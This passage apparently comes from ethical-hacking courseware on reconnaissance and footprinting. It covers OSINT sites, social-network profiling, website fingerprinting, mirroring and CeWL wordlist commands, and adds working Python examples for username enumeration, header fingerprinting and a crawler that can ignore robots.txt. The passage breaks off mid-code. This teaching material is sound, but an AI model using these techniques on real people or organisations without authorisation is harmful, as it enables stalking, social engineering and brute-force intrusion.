Source: http://www.secinfo.com
SEC Info offers the U.S. Securities and Exchange Commission (SEC) EDGAR database service on the web, with many links added to SEC documents. It allows searches by name, industry, business, SIC code, area code, accession number, CIK, file number, topic, ZIP code, and so on.
The Search Monitor
Source: https://www.thesearchmonitor.com
The Search Monitor provides competitive intelligence to monitor brand and trademark use, affiliate compliance, and competitive advertisers on paid search, organic search, local search, social media, mobile, and shopping search engines worldwide. It helps interactive agencies, search marketers, and affiliate marketers to track ad rank, ad copy, keyword reach, monthly ad spending, click rates and CPCs, market share, trademark use, and affiliate activity.
USPTO
Source: https://www.uspto.gov
The United States Patent and Trademark Office (USPTO) provides information related to patent and trademark registration. It provides general information concerning patents and search options for patents and trademark databases.
Competitive Intelligence - What Expert Opinions Say About the Company?
Information resource sites that help the attacker to obtain expert opinions about the target company include:
SEMRush
Source: https://www.semrush.com
SEMRush is a competitive keyword research tool. It can provide a list of Google keywords and AdWords for any site, as well as a competitor list in the organic and paid Google search results. It enables an approach for gaining in-depth knowledge about what competitors are advertising and their budget allocation to specific Internet marketing tactics.
AttentionMeter
Source: http://www.attentionmeter.com
AttentionMeter is a tool for comparing websites (traffic) by using Alexa, Compete, and Technorati. It gives a snapshot of traffic data as well as graphs from Alexa, Compete, and Technorati for the specified websites.
ABI/INFORM Global
Source: https://www.proquest.com
ABI/INFORM Global is a business database. ABI/INFORM Global offers the latest business and financial information for researchers. With ABI/INFORM Global, users can determine business conditions, management theory, techniques, and tactics, corporate strategy and practice, business trends, and the competitive landscape.
SimilarWeb
Source: https://www.similarweb.com
SimilarWeb aggregates data from multiple sources to estimate traffic, geography, and referral data for a company's websites and mobile apps. It also provides a panel through a browser extension that allows refining other data sources by anonymously tracking browser activity across millions of browsers worldwide.
Other Techniques for Footprinting through Web Services
Information Gathering Using Business Profile Sites
Finding useful information from corporate websites is a necessary step in the information gathering phase. These business profile sites contain business information of companies located in a particular region with their contact information, which can be viewed by anyone.
Attackers use business profile sites such as opencorporates, Crunchbase, and corporationwiki to gather important information about the target organizations, such as their location, addresses, contact information (such as phone numbers and email addresses), employee database, department names, type of service provided, and type of industry.
Figure 2.33: Screenshot of opencorporates search showing results for Microsoft
Monitoring Targets Using Alerts
Alerts are content monitoring services that provide automated, up-to-date information based on user preference, usually via email or SMS. To receive alerts, a user must register on the website and provide either an email address or a phone number. Online alert services automatically notify users when new content from news, blogs, and discussion groups matches a set of search terms selected by the user. These services provide up-to-date information about competitors and the industry. Alerts are sent via email or SMS notifications.
Tools such as Google Alerts, Twitter Alerts, and Giga Alerts help attackers to track mentions of the organization's name, member names, website, or any people or projects that are important. Attackers can gather updated information about the target periodically from the alert services and use it for further attacks.
Google Alerts
Source: https://www.google.com/alerts
Google Alerts automatically notifies users when new content from news, websites, blogs, videos, and/or discussion groups matches a set of search terms selected by the user and stored by the Google Alerts service.
Figure 2.34: Screenshot of Google Alerts
Figure 2.35: Screenshot of Google Alert Preview
Tracking the Online Reputation of the Target
Online Reputation Management (ORM) is a process of monitoring what is displayed when someone searches for your company's reputation on the Internet. ORM then takes measures to minimize negative search results or reviews. The process helps to improve brand reputation.
Companies often track the public feedback given to them using ORM tracking tools and then take measures to improve their credibility and retain their customers' trust. For positive online reputation management, organizations will often try to be more transparent over the Internet. This transparency may help the attacker to collect genuine information about the target organization.
Online Reputation Tracking Tools
Online reputation tracking tools help us to discover what people are saying online about the company's brand in real time across the web, social media, and news. They help in monitoring, measuring, and managing one's reputation online.
An attacker may use ORM tracking tools to:
- Track a company's online reputation
- Collect a company's search engine ranking information
- Obtain email notifications when a company is mentioned online
- Track conversations
- Obtain social news about the target organization
Mention
Source: https://mention.com
Mention is an online reputation tracking tool that helps attackers in monitoring the web, social media, forums, and blogs to learn more about the target brand and industry. As shown in the screenshot, this tool helps attackers in tracking online conversations as they happen, wherever they happen. Using Mention, attackers can have live, up-to-date reports delivered to any email address in real time.
Figure 2.36: Screenshot of Mention
Information Gathering Using Groups, Forums, and Blogs
Many Internet users use blogs, groups, and forums for knowledge sharing purposes. For this reason, attackers often focus on groups, forums, and blogs to find information about a target organization and its people. Organizations generally fail to monitor the exchange of information that employees reveal to other users in forums, blogs, and group discussions. Attackers see this as an advantage and collect sensitive information about the target, such as public network information, system information, and employee personal information. Attackers can register with fake profiles in Google groups, Yahoo groups, and so on. They try to join the target organization's groups, where they can obtain personal and company information. Attackers can also search for information in groups, forums, and blogs by Fully Qualified Domain Names (FQDNs) and IP addresses.
Employee information that an attacker can gather from groups, forums, and blogs may include:
- Full name of the employee
- Place of work and residence
- Home telephone, cell number, or office number
- Personal and organizational email address
- Pictures of the employee residence or work location that include identifiable information
- Pictures of employee awards and rewards or upcoming goals
Figure 2.37: Screenshot of Google Groups
Information Gathering Using NNTP Usenet Newsgroups
A Usenet newsgroup is a repository containing a collection of notes or messages on various subjects and topics that are submitted by the users over the Internet. Network News Transfer Protocol (NNTP) is used to relay Usenet news articles from the discussions over the newsgroup. Usenet newsgroups can be a useful source of valuable information about the target. People seek help by posting questions and asking for a solution on Usenet newsgroups. Many professionals use the newsgroups to resolve their technical issues by posting questions on Usenet. To obtain solutions for these issues, sometimes they post more detailed information about the target than needed. Attackers can search Usenet newsgroups and mailing lists, through Usenet providers such as Newshosting, Eweka, and Supernews, to find valuable information about the operating systems, software, web servers, etc., used by the target organization.
For example, from the screenshot given below, you can understand that the target organization is using a Red Hat Linux 6.2 machine that is running Apache web server 1.3.23. This information helps attackers in performing web server and web application attacks.
Figure 2.38: Screenshot of sample USENET newsgroup posting
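The extraction step behind both the job-posting passage earlier and the Usenet example above, as an added example that is not the book's code: given the free text of a posting, it pulls out product names and the version attached to each (Red Hat Linux 6.2, Apache 1.3.23, Windows Server 2012 R2, Oracle 11g) so the technology stack can be fed to vulnerability lookup. The product list is an assumption chosen for the example, and both sample posts are constructed; the Usenet sample is written to reproduce the pair shown in the book's screenshot.

```python
import re

# Products the extractor knows about (assumption for the example; extend per engagement).
PRODUCTS = [
    "Red Hat Linux", "Windows Server", "Ubuntu", "CentOS", "Apache", "nginx",
    "Microsoft IIS", "IIS", "Tomcat", "PHP", "MySQL", "Oracle", "Cisco ASA",
    "Cisco", "Palo Alto", "Fortinet", "VMware ESXi", "Microsoft Exchange",
]
# Longest names first so "Cisco ASA" is preferred over "Cisco" and "Microsoft IIS" over "IIS".
PRODUCTS.sort(key=len, reverse=True)

# Words that often sit between a product name and its version ("Apache web server 1.3.23").
FILLER = r"(?:\s+(?:web\s+server|httpd|database))?"
# Version shapes seen in posts: 6.2, 1.3.23, 2012 R2, 11g, v2.4; the whole group is optional.
VERSION = r"(?:\s*(?:v|version\s*)?(\d+(?:\.\d+)*(?:\s*R\d+)?[a-z]?))?"
TECH_RE = re.compile(
    r"\b(" + "|".join(re.escape(p) for p in PRODUCTS) + r")\b" + FILLER + VERSION,
    re.IGNORECASE,
)


def extract_tech(text):
    """Return sorted unique (product, version) pairs found in free text.
    If a product appears both with and without a version, only the versioned hits
    are kept; a product never seen with a version is reported with ''."""
    hits = {}
    for m in TECH_RE.finditer(text):
        canon = next(p for p in PRODUCTS if p.lower() == m.group(1).lower())
        version = re.sub(r"\s+", " ", m.group(2) or "")
        hits.setdefault(canon, set()).add(version)
    pairs = []
    for product, versions in hits.items():
        versioned = {v for v in versions if v}
        for v in (versioned or {""}):
            pairs.append((product, v))
    return sorted(pairs)


# Constructed sample posts (not real postings): one Usenet-style support question and
# one job advertisement of the kind the text describes.
SAMPLE_POSTS = {
    "usenet": (
        "Subject: Apache segfault after upgrade\n"
        "We run Red Hat Linux 6.2 on our DMZ box with Apache web server 1.3.23 and PHP 4.1.2. "
        "Since last week httpd dies under load; config is /etc/httpd/conf/httpd.conf."
    ),
    "job_posting": (
        "Network Administrator, example-corp.com. Requirements: 3+ years with Cisco ASA 9.8 "
        "firewalls, Windows Server 2012 R2 and Ubuntu 18.04 administration, Oracle 11g "
        "databases, VMware ESXi 6.7 clusters."
    ),
}

if __name__ == "__main__":
    for name, post in SAMPLE_POSTS.items():
        print(name, extract_tech(post))
```

The output is a list of (product, version) pairs per post; the de-duplication rule matters in practice because a subject line usually names the product bare and only the body gives the version that makes a CVE lookup meaningful.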
Footprinting through Social Networking Sites
While footprinting through social networking sites may seem similar to footprinting through social engineering (which is discussed in greater detail later), there are some differences between the two methods. In footprinting through social engineering, the attacker tricks people into revealing information, whereas in footprinting through social networking sites, the attacker gathers information available on those sites. Attackers can even use social networking sites as a medium to perform social engineering attacks. This section aims to familiarize you with social engineering on social networking sites, the type of information one can collect from social networking sites, and how to locate information from social media sites using various online services and resources.
Collecting Information through Social Engineering on Social Networking Sites
Social networking sites are online services, platforms, or other sites that allow people to connect and to build interpersonal relations. The use of social networking sites is increasing rapidly. Examples of such sites include LinkedIn, Facebook, Instagram, Pinterest, Twitter, YouTube, and so on. Each social networking site has its own purpose and features. One site may connect friends and family, while another helps users to share professional profiles. Social networking sites are open to everyone. Attackers may take advantage of this feature to gather sensitive information from users either by browsing through users' public profiles or by creating a fake profile to pose as a genuine user. On social networking sites, people may post personal information such as date of birth, educational information, employment background, spouse's names, and so on. Organizations often post information about potential partners, websites, and upcoming news about the company.
For an attacker, social networking sites can be valuable sources of information about the target person or organization. There are no barriers for attackers to access the public pages of accounts created on social networking sites. The attacker can only gather information that is posted by the individuals. To obtain more information about the target, attackers may create fake accounts and use social engineering techniques to lure the victim into revealing more information. For example, the attacker can send a friend request to the target person from a fake account; if the victim accepts the request, then the attacker can access even the restricted pages of the target person on that website.
Information Available on Social Networking Sites
So far, we have discussed how an attacker can collect information from social networking sites. Now, we will discuss what information an attacker can get from social networking sites.
People usually maintain profiles on social networking sites to provide basic information about themselves and to help create and maintain connections with others. A profile generally contains personal information such as a person's name, contact information (cell phone number, email address), friends' information, information about family members, interests, and activities.
People usually connect with friends and chat with them. Attackers can gather sensitive information through these chats. Social networking sites also allow people to share photos and videos. If users fail to set the appropriate privacy settings for their albums, then attackers can see the pictures and videos shared by them. Users may join groups to play games or to share their views and interests. Attackers can collect information about the victim's interests by tracking his or her groups and can then mislead the victim into revealing more information. Users may create events to notify other users about upcoming occasions, from which attackers will come to know about the user's activities.
The activities of users on social networking sites and the respective information that an attacker can collect are summarized in the following table.

What Users Do                      | What Attacker Gets
-----------------------------------|------------------------------------------------------------------
Maintain profile                   | Contact info, location, and related information
Connect to friends, chat           | Friends list, friends' info, and related information
Share photos and videos            | Identity of family members, interests, and related information
Play games, join groups            | Interests
Create events                      | Activities

Table 2.5: Activities of users on the social networking sites and the respective information

Like individuals, organizations also use social networking sites to connect with people, promote their products, and gather feedback about their products and services. The activities of an organization on social networking sites and the respective information that an attacker can collect are summarized in the table below.

What Organizations Do              | What Attacker Gets
-----------------------------------|------------------------------------------------------------------
User surveys                       | Business strategies
Promote products                   | Product profile
User support                       | Social engineering
Recruitment                        | Platform/technology information
Background check to hire employees | Type of business

Table 2.6: Activities of the organization on the social networking sites and the respective information
General Resources for Locating Information from Social Media Sites

Several online services and resources are available to gather valuable information about a target from one or more social media sites. These services allow attackers to discover the most shared content across social media sites by using hashtags or keywords, track accounts and URLs on various social media sites, obtain a target's email address, etc. This information helps attackers to perform phishing, social engineering, and other types of attacks.

Attackers use tools such as BuzzSumo, Google Trends, Hashatit, and Ubersuggest to locate information on social media sites:

▪ BuzzSumo
  Source: https://buzzsumo.com
  BuzzSumo's advanced social search engine finds the most shared content for a topic, author, or domain. It shows the shared activity across all the major social networks including Facebook, Twitter, LinkedIn, Google Plus, and Pinterest. As shown in the screenshot, attackers use BuzzSumo to track the most shared content related to the target domain and obtain details such as social media account information, URLs, and email addresses.

Figure 2.39: Screenshot of BuzzSumo showing the shared content

Conducting Location Search on Social Media Sites

Conducting a location search on social media sites such as Twitter, Instagram, and Facebook helps attackers to detect the geolocation of the target. This information further helps attackers to perform various social engineering and non-technical attacks. Many online tools such as Followerwonk, Hootsuite, and Sysomos are available to search for both geotagged and non-geotagged information on social media sites. Attackers search social media sites using these online tools with keywords, usernames, date, time, and so on.

▪ Followerwonk
  Source: https://followerwonk.com
  Followerwonk helps you explore and grow your social graph. Dig deeper into Twitter analytics: Who are your followers? Where are they located? When do they tweet? As shown in the screenshot, attackers use Followerwonk to track the geolocation of the target Twitter users.

Tools for Footprinting through Social Networking Sites

Attackers use various tools such as Sherlock, Social Searcher, and UserRecon to footprint social networking sites such as Twitter, Instagram, Facebook, and Pinterest to gather sensitive information about the target such as DOB, educational qualification, employment status, names of relatives, and information about the organization that they are working for, including the business strategy, potential clients, and upcoming project plans.

▪ Sherlock
  Source: https://github.com
  As shown in the screenshot, attackers use Sherlock to search a vast number of social networking sites for a target username. This tool helps the attacker to locate the target user on various social networking sites along with the complete URL.

Figure 2.41: Screenshot showing the result of Sherlock tool (the command used to search for a target user on social media platforms, with each site reported as found or "Not Found")
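The following Python example is added here as an illustration and is not part of the courseware or of the Sherlock project. It shows the logic such a tool runs for every site: fill a profile-URL template with the username, fetch it, and decide "found" either from the HTTP status code or, for sites that answer 200 even for unknown users, from the absence of the site's own "not found" text. The site table, the host names and the responses are constructed (the .test domain is reserved), and the fetch function is injected so the code runs offline; live_fetch() is what would be passed in against real sites.

```python
"""Sherlock-style username enumeration.

Every site in the table has a profile-URL template and a detection rule:
  "status"  - the profile exists when the site answers 200
  "message" - the site answers 200 even for unknown users, so the profile is
              absent only when its own "not found" text appears in the body
The fetch function is injected so the logic runs offline against constructed
responses; live_fetch() is what you would pass in against real sites.
"""
import re
import urllib.error
import urllib.request
from typing import Callable, Dict, List, Tuple

Fetcher = Callable[[str], Tuple[int, str]]  # url -> (HTTP status, body)

# Hypothetical site table (real tools ship hundreds of these entries).
SITES: Dict[str, dict] = {
    "ExampleHub":   {"url": "https://examplehub.test/{u}", "rule": "status"},
    "ExampleGram":  {"url": "https://examplegram.test/{u}/", "rule": "message",
                     "error": "Sorry, this page isn't available"},
    "ExampleForum": {"url": "https://forum.example.test/u/{u}", "rule": "status"},
}

# Reject anything that could alter the URL path (e.g. "../" or "?").
USERNAME_RE = re.compile(r"^[A-Za-z0-9._-]{1,39}$")


def check_username(username: str, fetch: Fetcher,
                   sites: Dict[str, dict] = SITES) -> List[Tuple[str, str, bool]]:
    """Return (site, profile_url, found) for every site in the table."""
    if not USERNAME_RE.match(username):
        raise ValueError("username contains characters that are not safe in a URL path")
    results = []
    for name, site in sites.items():
        url = site["url"].format(u=username)
        status, body = fetch(url)
        if site["rule"] == "status":
            found = status == 200
        else:
            found = status == 200 and site["error"] not in body
        results.append((name, url, found))
    return results


def format_report(results: List[Tuple[str, str, bool]]) -> str:
    """Render results in the [+]/[-] style Sherlock prints."""
    return "\n".join(f"[+] {n}: {u}" if f else f"[-] {n}: Not Found" for n, u, f in results)


def live_fetch(url: str, timeout: int = 10) -> Tuple[int, str]:
    """Real fetcher (needs network); a browser-like User-Agent avoids trivial bot blocks."""
    req = urllib.request.Request(url, headers={"User-Agent": "Mozilla/5.0"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, ""


# Constructed responses standing in for the three sites above.
FAKE_SITE = {
    "https://examplehub.test/jdoe": (200, "<html>jdoe's repositories</html>"),
    "https://examplegram.test/jdoe/": (200, "<html>Sorry, this page isn't available.</html>"),
    "https://forum.example.test/u/jdoe": (404, "no such user"),
}


def fake_fetch(url: str) -> Tuple[int, str]:
    return FAKE_SITE.get(url, (404, ""))


if __name__ == "__main__":
    print(format_report(check_username("jdoe", fake_fetch)))
```

The "message" rule is the part worth noting: a status-only check reports a false positive on every site that serves a soft 404, which is why a real site table records the error string per site.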

▪ Social Searcher
  Source: https://www.social-searcher.com
  Social Searcher allows attackers to search for content in social networks in real time and provides deep analytics data. Attackers use this tool to track a target user on various social networking sites and obtain information such as complete URLs to their profiles, their postings, and other personal information.

Figure 2.42: Screenshot of Social Searcher showing user content on social networks

Website Footprinting

So far, we have discussed footprinting through search engines, web services, and social networking sites. Hereafter, we will discuss website footprinting. An organization's website is the first place to get sensitive information such as names and contact details of the leaders of the organization, upcoming project details, and so on.

This section covers the website footprinting concept, mirroring websites, extracting website information and links, gathering wordlists, extracting metadata of public documents, and monitoring web updates and website traffic.

Website footprinting refers to monitoring and analyzing a target organization's website for information. An attacker can build a detailed map of a website's structure and architecture without triggering the IDS or arousing the suspicion of any system administrator. Attackers use sophisticated footprinting tools or the basic tools that come with the operating system, such as Telnet or a browser.

The Netcraft tool can gather website information such as IP address, registered name and address of the domain owner, domain name, host of the site, and OS details. However, the tool may not give all these details for every site. In such cases, the attacker can browse the target website.

Browsing the target website will typically provide the following information:

▪ Software used and its version: An attacker can easily find the software and version in use on an off-the-shelf software-based website.
▪ Operating system used: Usually, the operating system in use can also be determined.
▪ Sub-directories and parameters: Searches can reveal the sub-directories and parameters by making a note of the URLs while browsing the target website.
▪ Filename, path, database field name, or query: The attacker will often carefully analyze anything after a query that looks like a filename, path, database field name, or query to check whether it offers opportunities for SQL injection.
▪ Scripting platform: With the help of script filename extensions such as .php, .asp, or .jsp, one can easily determine the scripting platform that the target website is using.
▪ Technologies used: By inspecting the URLs of the target website, one can easily determine the technologies (.NET, J2EE, PHP, etc.) used to build that website.
▪ Contact details and CMS details: The contact pages usually offer details such as names, phone numbers, email addresses, and locations of admin or support personnel. An attacker can use these details to perform a social engineering attack. CMS software allows URL rewriting to disguise script filename extensions, in which case the attacker has to devote additional effort toward determining the scripting platform.

Attackers use Burp Suite, Zaproxy, WhatWeb, BuiltWith, Wappalyzer, and Website Informer to view headers that provide:

▪ Connection status and content type
▪ Accept-Ranges and Last-Modified information
▪ X-Powered-By information
▪ Web server in use and its version

▪ Burp Suite
  Source: https://portswigger.net
  Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work together to support the entire testing process, from initial mapping and analysis of an application's attack surface to finding and exploiting security vulnerabilities. Burp Proxy allows attackers to intercept all requests and responses between the browser and the target web application and obtain information such as the web server used, its version, and web-application-related vulnerabilities.

Figure 2.43: Screenshot of Burp Suite

Website footprinting can be performed by examining HTML source code and cookies.

▪ Examining the HTML source code
  Attackers can gather sensitive information by examining the HTML source code and following the comments that are inserted manually or those that the CMS creates. The comments may provide clues as to what is running in the background. They may even provide contact details of the web developer or administrator. Observe all the links and image tags to map the system file structure. This will reveal the existence of hidden directories and files. Enter fake data to determine how the script works. It is sometimes possible to edit the source code.

Figure 2.44: Screenshot showing HTML source

▪ Examining cookies
  To determine the software running and its behavior, one can examine the cookies set by the server. Identify the scripting platforms by observing session and other supporting cookies. The information about cookie name, value, domain, and size can also be extracted.

Figure 2.45: Screenshot showing cookies
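The following Python example is added as an illustration and is not part of the courseware or of any of the tools named above. It takes one raw HTTP response of the kind Burp Proxy shows, together with the URLs noted while browsing, and applies the checks described in the two passages above: it reads the headers listed earlier (Server, X-Powered-By, Content-Type, Accept-Ranges, Last-Modified, Connection), infers the scripting platform from the session-cookie names and the script filename extensions, and records query parameters worth testing for injection. The response, host name and cookie-name table are constructed; the mapping from default session-cookie names to platforms is an assumption that breaks when an administrator renames them.

```python
"""Fingerprint a web stack from one raw HTTP response plus the URLs noted while browsing.

It pulls the response headers the text lists, infers the scripting platform
from session-cookie names and script extensions, and records query parameters
that deserve injection testing. The response and URLs below are constructed,
so the code runs offline; feed it a response captured in Burp Proxy for a real target.
"""
from urllib.parse import parse_qsl, urlsplit

# Default session-cookie names per platform (assumption: unrenamed defaults).
COOKIE_PLATFORMS = {
    "PHPSESSID": "PHP",
    "ASP.NET_SESSIONID": "ASP.NET",
    "ASPSESSIONID": "Classic ASP",          # real name carries a random suffix
    "JSESSIONID": "Java (Servlet/JSP)",
    "CFID": "ColdFusion",
    "LARAVEL_SESSION": "PHP (Laravel)",
    "CI_SESSION": "PHP (CodeIgniter)",
}
EXT_PLATFORMS = {".php": "PHP", ".asp": "Classic ASP", ".aspx": "ASP.NET",
                 ".jsp": "Java (Servlet/JSP)", ".cfm": "ColdFusion", ".do": "Java (Struts)"}
INTEREST_HEADERS = ("Server", "X-Powered-By", "X-AspNet-Version", "X-Generator",
                    "Content-Type", "Accept-Ranges", "Last-Modified", "Connection")


def parse_response(raw: str):
    """Split a raw HTTP response into (status_code, {lowercased name: [values]})."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    status = int(lines[0].split()[1])
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers.setdefault(name.strip().lower(), []).append(value.strip())
    return status, headers


def fingerprint(raw_response: str, urls):
    status, headers = parse_response(raw_response)
    report = {"status": status, "headers": {}, "cookies": [], "platforms": set(), "params": {}}
    for name in INTEREST_HEADERS:
        if name.lower() in headers:
            report["headers"][name] = headers[name.lower()][0]
    for set_cookie in headers.get("set-cookie", []):
        cookie = set_cookie.split("=", 1)[0].strip()
        report["cookies"].append(cookie)
        for known, platform in COOKIE_PLATFORMS.items():
            if cookie.upper().startswith(known):
                report["platforms"].add(platform)
    powered = headers.get("x-powered-by", [""])[0]
    if powered:
        report["platforms"].add(powered.split("/")[0].strip())   # "PHP/7.4.3" -> "PHP"
    if "x-aspnet-version" in headers:
        report["platforms"].add("ASP.NET")
    for url in urls:
        parts = urlsplit(url)
        for ext, platform in EXT_PLATFORMS.items():
            if parts.path.lower().endswith(ext):
                report["platforms"].add(platform)
        for key, _ in parse_qsl(parts.query, keep_blank_values=True):
            report["params"].setdefault(key, set()).add(parts.path)   # candidates for injection tests
    return report


# Constructed response and URL list (not from a real host).
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Date: Mon, 06 Jul 2020 10:15:00 GMT\r\n"
    "Server: Apache/2.4.41 (Ubuntu)\r\n"
    "X-Powered-By: PHP/7.4.3\r\n"
    "Set-Cookie: PHPSESSID=7f3a1c9e; path=/; HttpOnly\r\n"
    "Set-Cookie: wp-settings-1=editor%3Dtinymce; path=/\r\n"
    "Last-Modified: Fri, 03 Jul 2020 08:00:00 GMT\r\n"
    "Accept-Ranges: bytes\r\n"
    "Connection: keep-alive\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n"
    "\r\n"
    "<html><!-- built by webdev@example.test --></html>"
)
SAMPLE_URLS = [
    "https://www.example.test/index.php",
    "https://www.example.test/products/view.php?id=42&cat=tools",
    "https://www.example.test/images/logo.png",
]

if __name__ == "__main__":
    for key, value in fingerprint(SAMPLE_RESPONSE, SAMPLE_URLS).items():
        print(f"{key}: {value}")
```

Three independent signals (X-Powered-By, the PHPSESSID cookie, the .php extension) agree on PHP in the sample; when they disagree on a real target, the header is the one most likely to have been deliberately changed.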

Website Footprinting using Web Spiders

A web spider (also known as a web crawler or web robot) is a program or automated script that browses websites in a methodical manner to collect specific information such as employee names and email addresses. Attackers then use the collected information to perform footprinting and social engineering attacks. Well-behaved web spiders stop crawling the directories listed in a robots.txt file placed in the website's root directory; an attacker's spider can ignore that file, and the listed directories are themselves a useful clue to content the owner wanted to keep out of search results.

Attackers can uncover all the files and web pages on the target website by simply feeding the web spider with a URL. Then, the web spider sends hundreds of requests to the target website and analyzes the HTML code of all the received responses to identify additional links. If any new links are found, then the spider adds them to the target list and starts spidering and analyzing the newly discovered links. This method helps attackers not only to detect exploitable web-attack surfaces but also to find all the directories, web pages, and files that make up the target website.

User-Directed Spidering

Attackers, in some cases, use a more sophisticated technique for spidering the target website instead of using automated tools. They use standard web browsers to walk through the target website in an attempt to navigate through all the functionalities provided by the web application. While performing this task, the resulting incoming and outgoing traffic of the website is monitored and analyzed by tools that include features of both a web spider and an intercepting proxy. Further, these tools create a map of the web application consisting of all the URLs visited by the browser. They also analyze the responses of the application and update the map with the discovered content and its functionalities. Attackers use tools such as Burp Suite and WebScarab to perform user-directed spidering.

Web spidering tools such as Web Data Extractor, ParseHub, and SpiderFoot can collect sensitive information from the target website.

▪ Web Data Extractor
  Source: http://www.webextractor.com
  Web Data Extractor automatically extracts specific information from web pages. It extracts targeted contact data (email, phone, and fax) from the website, extracts the URL and meta tags (title, description, keyword) for website promotion, searches directory creation, performs web research, and so on. As shown in the screenshot, attackers use Web Data Extractor to automatically gather critical information such as lists of meta tags, e-mail addresses, and phone and fax numbers from the target website.

Figure 2.46: Screenshot of Web Data Extractor

Mirroring Entire Website

Website mirroring is the process of creating a replica or clone of the original website using mirroring tools such as HTTrack Web Site Copier and NCollector Studio. These tools download a website to a local directory and recursively build all the directories including HTML, images, flash, videos, and other files from the web server on another computer. Website mirroring has the following benefits:

▪ It is helpful for offline site browsing
▪ It enables an attacker to spend more time in viewing and analyzing the website for vulnerabilities and loopholes
▪ It helps in finding the directory structure and other valuable information from the mirrored copy without multiple requests to the web server

Attackers can use this information to perform various web application attacks on the target organization's website.

Website Mirroring Tool: HTTrack Web Site Copier
Source: http://www.httrack.com

HTTrack is an offline browser utility. It downloads a website from the Internet to a local directory and recursively builds all the directories including HTML, images, and other files from the web server on another computer.

As shown in the screenshot, attackers use HTTrack to mirror the entire website of the target organization, store it in the local system drive, and browse the local website to identify possible exploits and vulnerabilities.

Figure 2.47: Screenshot of HTTrack Web Site Copier mirroring the target website

Extracting Website Information from https://archive.org

Source: https://archive.org

The Internet Archive's Wayback Machine lets one explore archived versions of websites. Such exploration allows an attacker to gather information on an organization's web pages since its creation. As the website https://archive.org keeps track of web pages from the time of their creation, an attacker can retrieve even information removed from the target website, such as web pages, audio files, video files, images, text, and software programs. Attackers use this information to perform phishing and other types of web application attacks on the target organization.

Figure 2.48: Screenshot of Archive showing archived versions of microsoft.com

Figure 2.49: Screenshot of Archive showing archived web pages of microsoft.com

Extracting Website Links

Extracting website links is an important part of website footprinting, where an attacker analyzes a target website to determine its internal and external links. Using the gathered information, an attacker can find out the applications, web technologies, and other related websites that are linked to the target website. Further, dumping the obtained links can reveal important connections and URLs of other resources such as CSS and JavaScript files. This information helps attackers to identify application vulnerabilities in the target website and find ways to exploit the web application.

Attackers can use various online tools or services such as Octoparse, Netpeak Spider, and Link Extractor to extract linked images, scripts, iframes, URLs, etc., of the target website. Using these tools, an attacker can also extract important backlinks to a target website, which can provide useful information about the target to perform further exploitation.

▪ Octoparse
  Source: https://www.octoparse.com
  Octoparse offers automatic data extraction, as it quickly scrapes web data without coding and turns web pages into structured data. As shown in the screenshot, attackers use Octoparse to capture information from web pages, such as text, links, image URLs, or HTML code.

Figure 2.50: Screenshot of Octoparse

Figure 2.51: Screenshot showing output of Octoparse

Gathering Wordlist from the Target Website

The words available on the target website may reveal critical information that helps attackers to perform further exploitation. Attackers gather a list of email addresses related to the target organization using various search engines, social networking sites, web spidering tools, etc. After obtaining these email addresses, an attacker can gather a list of words available on the target website. This information helps the attacker to perform brute-force attacks on the target organization. An attacker uses the CeWL tool to gather a list of words from the target website and perform a brute-force attack on the email addresses gathered earlier.

▪ CeWL
  To run the tool, issue the following commands:

      ruby cewl.rb --help

  This command displays various options that a user can use to obtain a list of words from the target website.

      cewl www.certifiedhacker.com

  This command returns a list of unique words present in the target URL.

      cewl --email www.certifiedhacker.com

  In this case, the target website is www.certifiedhacker.com, and the '--email' option is used to fetch a list of words and email addresses from the target website.

Figure 2.52: Screenshot showing results obtained from CeWL tool
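The following Python example is added as an illustration and is not part of the courseware, of CeWL, or of any spidering tool named above. It implements in one place what the three preceding passages describe (web spiders, extracting website links, and gathering a wordlist): starting from one URL it reads robots.txt, follows same-site links, records every page, linked resource (scripts, stylesheets, images, iframes), HTML comment and e-mail address it encounters, and counts the words on the pages so that the most frequent ones can be emitted as a wordlist, as `cewl` does. The site is constructed in memory (the .test domain is reserved) and fetch() stands in for an HTTP client; obey_robots=False shows the attacker's case of ignoring the Disallow entries.

```python
"""In-memory web spider that doubles as a CeWL-style wordlist builder.

A polite crawler skips the robots.txt Disallow entries; an attacker's spider
can ignore them (obey_robots=False), and the entries themselves point at paths
the owner wanted hidden. The site below is constructed; replace fetch() with an
HTTP client to run against a real target.
"""
import re
from collections import Counter, deque
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Constructed target site (not a real host).
SITE = {
    "https://www.example.test/robots.txt": "User-agent: *\nDisallow: /admin/\nDisallow: /backup/\n",
    "https://www.example.test/": """<html><head><title>Example Corp</title>
<link rel="stylesheet" href="/static/site.css"><script src="/static/app.js"></script></head>
<body><!-- TODO: remove test login at /admin/login.php before launch -->
<a href="/about.html">About Example Corp</a> <a href="/products/list.php?cat=tools">Products</a>
<img src="/images/logo.png"><iframe src="https://cdn.partner.test/widget"></iframe>
<p>Contact sales@example.test or support@example.test for Galaxy Series pricing.</p></body></html>""",
    "https://www.example.test/about.html": """<html><body><h1>About Example Corp</h1>
<p>Founded in 2009 by Alice Winterbourne. Our Galaxy Series platform serves enterprise clients.</p>
<a href="/">Home</a> <a href="/admin/">Staff portal</a> <a href="https://partner.test/">Partner</a></body></html>""",
    "https://www.example.test/products/list.php?cat=tools":
        "<html><body><p>Galaxy Series tools catalogue</p><a href='/about.html'>About</a></body></html>",
    "https://www.example.test/admin/":
        "<html><!-- admin v2.1.3 (DB host db01.internal) --><body>Login</body></html>",
}


def fetch(url):
    """Stand-in for an HTTP GET; returns the body or None for a missing page."""
    return SITE.get(url)


class PageParser(HTMLParser):
    """Collect links, embedded resources, comments and text from one page."""
    def __init__(self):
        super().__init__()
        self.links, self.resources, self.comments, self.text = [], [], [], []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "a" and a.get("href"):
            self.links.append(a["href"])
        elif tag in ("script", "img", "iframe") and a.get("src"):
            self.resources.append((tag, a["src"]))
        elif tag == "link" and a.get("href"):
            self.resources.append((tag, a["href"]))

    def handle_comment(self, data):
        self.comments.append(data.strip())

    def handle_data(self, data):
        self.text.append(data)


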